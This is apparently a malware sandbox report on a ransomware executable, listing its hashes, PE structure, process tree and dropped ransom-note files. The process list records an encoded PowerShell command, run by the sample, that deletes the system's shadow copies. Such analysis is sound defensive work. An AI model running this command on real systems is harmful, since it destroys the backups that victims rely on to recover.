analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

3d0513ff8f797e7c8aee2453d6d89fcc6ca6c82f7b84e037b391136b0d4662d4

Full analysis: https://app.any.run/tasks/150f9ac5-8788-470a-9d06-b188aeec24a9
Verdict: Malicious activity
Threats:

Ransomware is a type of malicious software that locks users out of their system or data using different methods to force them to pay a ransom. Most often, such programs encrypt files on an infected machine and demand a fee to be paid in exchange for the decryption key. Additionally, such programs can be used to steal sensitive information from the compromised computer and even conduct DDoS attacks against affected organizations to pressure them into paying.

Analysis date: October 20, 2020, 13:23:21
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ransomware
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows
MD5:

4355F77BD79D511591EDDABEAEBBE46B

SHA1:

6C25A2E36E4649925FB83D57B7FCA894057EDC7B

SHA256:

3D0513FF8F797E7C8AEE2453D6D89FCC6CA6C82F7B84E037B391136B0D4662D4

SSDEEP:

3072:kr6RHlaZk/2RexaqRXac0qUyQcjoWbNf5:pNlaZ8ZxaqdJ0yQcJf

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Renames files like Ransomware

      • 3d0513ff8f797e7c8aee2453d6d89fcc6ca6c82f7b84e037b391136b0d4662d4.exe (PID: 3860)
  • SUSPICIOUS

    • Executed as Windows Service

      • vssvc.exe (PID: 3352)
    • Creates files in the user directory

      • powershell.exe (PID: 2396)
    • Executed via COM

      • unsecapp.exe (PID: 124)
    • Executes PowerShell scripts

      • 3d0513ff8f797e7c8aee2453d6d89fcc6ca6c82f7b84e037b391136b0d4662d4.exe (PID: 3860)
    • Application launched itself

      • 3d0513ff8f797e7c8aee2453d6d89fcc6ca6c82f7b84e037b391136b0d4662d4.exe (PID: 1856)
    • Creates files in the program directory

      • 3d0513ff8f797e7c8aee2453d6d89fcc6ca6c82f7b84e037b391136b0d4662d4.exe (PID: 3860)
  • INFO

    • Dropped object may contain TOR URL's

      • 3d0513ff8f797e7c8aee2453d6d89fcc6ca6c82f7b84e037b391136b0d4662d4.exe (PID: 3860)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (42.2)
.exe | Win64 Executable (generic) (37.3)
.dll | Win32 Dynamic Link Library (generic) (8.8)
.exe | Win32 Executable (generic) (6)
.exe | Generic Win/DOS Executable (2.7)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2019:04:19 13:10:35+02:00
PEType: PE32
LinkerVersion: 9
CodeSize: 41984
InitializedDataSize: 8812032
UninitializedDataSize: -
EntryPoint: 0x2b9d
OSVersion: 5
ImageVersion: -
SubsystemVersion: 5
Subsystem: Windows GUI
FileVersionNumber: 1.0.0.1
ProductVersionNumber: 1.0.0.1
FileFlagsMask: 0x006f
FileFlags: Pre-release, Patched
FileOS: Unknown (0x40304)
ObjectFileType: Static library
FileSubtype: -
LanguageCode: Chinese (Simplified)
CharacterSet: Unicode
InternalSurnames: dhrj.uxe
Copyright: Copyrighd (C) 2020, odhsjv
ProductionVersion: 1.0.4.8

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 19-Apr-2019 11:10:35
Detected languages:
  • Chinese - PRC
InternalSurnames: dhrj.uxe
Copyright: Copyrighd (C) 2020, odhsjv
ProductionVersion: 1.0.4.8

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x000000E0

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 4
Time date stamp: 19-Apr-2019 11:10:35
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_RELOCS_STRIPPED

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
.text
0x00001000
0x0000A299
0x0000A400
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
6.55115
.rdata
0x0000C000
0x00002DD8
0x00002E00
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
5.28667
.data
0x0000F000
0x0085A418
0x00017C00
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
7.10041
.rsrc
0x0086A000
0x000043A8
0x00004400
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
5.59596

Resources

Title
Entropy
Size
Codepage
Language
Type
1
3.35514
428
UNKNOWN
UNKNOWN
RT_VERSION
2
4.35521
1384
UNKNOWN
UNKNOWN
RT_ICON
3
5.69999
9640
UNKNOWN
UNKNOWN
RT_ICON
4
7.0499
1128
UNKNOWN
UNKNOWN
RT_ICON
23
3.29005
1426
UNKNOWN
UNKNOWN
RT_STRING
24
3.15503
478
UNKNOWN
UNKNOWN
RT_STRING
25
3.11399
476
UNKNOWN
UNKNOWN
RT_STRING
121
2.75638
62
UNKNOWN
UNKNOWN
RT_GROUP_ICON

Imports

KERNEL32.dll
WINHTTP.dll
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
48
Monitored processes
5
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start 3d0513ff8f797e7c8aee2453d6d89fcc6ca6c82f7b84e037b391136b0d4662d4.exe no specs 3d0513ff8f797e7c8aee2453d6d89fcc6ca6c82f7b84e037b391136b0d4662d4.exe powershell.exe no specs unsecapp.exe no specs vssvc.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1856"C:\Users\admin\AppData\Local\Temp\3d0513ff8f797e7c8aee2453d6d89fcc6ca6c82f7b84e037b391136b0d4662d4.exe" C:\Users\admin\AppData\Local\Temp\3d0513ff8f797e7c8aee2453d6d89fcc6ca6c82f7b84e037b391136b0d4662d4.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3860"C:\Users\admin\AppData\Local\Temp\3d0513ff8f797e7c8aee2453d6d89fcc6ca6c82f7b84e037b391136b0d4662d4.exe" C:\Users\admin\AppData\Local\Temp\3d0513ff8f797e7c8aee2453d6d89fcc6ca6c82f7b84e037b391136b0d4662d4.exe
3d0513ff8f797e7c8aee2453d6d89fcc6ca6c82f7b84e037b391136b0d4662d4.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
2396powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe3d0513ff8f797e7c8aee2453d6d89fcc6ca6c82f7b84e037b391136b0d4662d4.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
124C:\Windows\system32\wbem\unsecapp.exe -EmbeddingC:\Windows\system32\wbem\unsecapp.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Sink to receive asynchronous callbacks for WMI client application
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3352C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exeservices.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Microsoft® Volume Shadow Copy Service
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
636
Read events
570
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
157
Text files
1
Unknown types
3

Dropped files

PID
Process
Filename
Type
2396powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OUPXU9KA8TTYW41I0RFC.temp
MD5:
SHA256:
38603d0513ff8f797e7c8aee2453d6d89fcc6ca6c82f7b84e037b391136b0d4662d4.exeC:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\boot.sdi
MD5:
SHA256:
38603d0513ff8f797e7c8aee2453d6d89fcc6ca6c82f7b84e037b391136b0d4662d4.exec:\recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\Winre.wim.w0to9k
MD5:
SHA256:
38603d0513ff8f797e7c8aee2453d6d89fcc6ca6c82f7b84e037b391136b0d4662d4.exeC:\w0to9k.htmlbinary
MD5:B7E7C162F3A1775FE248E5EE564770B6
SHA256:1D5D2D5B71B3DBDA8B2CC67BD7ACCBDA93073A4FFDF4B30C9521CB99B6DBC729
2396powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2d70ef.TMPbinary
MD5:D6EE8C34E4C28999F00E385C8808E7DE
SHA256:39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB
38603d0513ff8f797e7c8aee2453d6d89fcc6ca6c82f7b84e037b391136b0d4662d4.exeC:\recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\w0to9k.htmlbinary
MD5:B7E7C162F3A1775FE248E5EE564770B6
SHA256:1D5D2D5B71B3DBDA8B2CC67BD7ACCBDA93073A4FFDF4B30C9521CB99B6DBC729
38603d0513ff8f797e7c8aee2453d6d89fcc6ca6c82f7b84e037b391136b0d4662d4.exeC:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\Winre.wim
MD5:
SHA256:
38603d0513ff8f797e7c8aee2453d6d89fcc6ca6c82f7b84e037b391136b0d4662d4.exeC:\users\administrator\w0to9k.htmlbinary
MD5:B7E7C162F3A1775FE248E5EE564770B6
SHA256:1D5D2D5B71B3DBDA8B2CC67BD7ACCBDA93073A4FFDF4B30C9521CB99B6DBC729
38603d0513ff8f797e7c8aee2453d6d89fcc6ca6c82f7b84e037b391136b0d4662d4.exeC:\users\public\w0to9k.htmlbinary
MD5:B7E7C162F3A1775FE248E5EE564770B6
SHA256:1D5D2D5B71B3DBDA8B2CC67BD7ACCBDA93073A4FFDF4B30C9521CB99B6DBC729
38603d0513ff8f797e7c8aee2453d6d89fcc6ca6c82f7b84e037b391136b0d4662d4.exeC:\recovery\w0to9k.htmlbinary
MD5:B7E7C162F3A1775FE248E5EE564770B6
SHA256:1D5D2D5B71B3DBDA8B2CC67BD7ACCBDA93073A4FFDF4B30C9521CB99B6DBC729
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info